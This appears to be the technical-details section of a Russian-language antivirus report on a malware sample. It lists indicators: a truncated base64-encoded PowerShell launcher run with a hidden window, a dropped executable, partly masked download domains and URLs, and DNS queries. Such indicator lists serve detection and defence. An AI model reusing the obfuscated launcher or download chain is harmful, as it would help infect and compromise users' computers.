Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAE4AZQB3AC0ATwBiAEoAZQBjAHQAIABJAG8ALgBjAG8AbQBwAHIARQBTAFMASQBvAE4ALgBEAEUARgBMAEEAVABlAHMAdABSAGUAQQBNACgAIABbAEkATwAuAG0ARQBtAG8AUgB5AHMAVAByAGUAQQBNAF0AIABbAHMAWQBzAHQAZQBNAC4AYwBvAG...
- %HOMEPATH%\272.exe
- %HOMEPATH%\272.exe
- 'za#####niegeorge.cba.pl':80
- 'st#####ingcreative.com':80
- 've##eria.id':443
- 'ro###irey.com':80
- 'ro###irey.com':443
- http://za#####niegeorge.cba.pl/images/JN/
- http://st#####ingcreative.com/wp-content/M0K/
- http://www.st#####ingcreative.com/wp-content/M0K/
- http://ro###irey.com/images/hf/
- 've##eria.id':443
- 'ro###irey.com':443
- DNS ASK tu####gspeech.com
- DNS ASK za#####niegeorge.cba.pl
- DNS ASK st#####ingcreative.com
- DNS ASK ve##eria.id
- DNS ASK ro###irey.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAE4AZQB3AC0ATwBiAEoAZQBjAHQAIABJAG8ALgBjAG8AbQBwAHIARQBTAFMASQBvAE4ALgBEAEUARgBMAEEAVABlAHMAdABSAGUAQQBNACgAIABbAEkATwAuAG0ARQBtAG8AUgB5AHMAVAByAGUAQQBNAF0AIABbAHMAWQBzAHQAZQBNAC4AYwBvAG...' (со скрытым окном)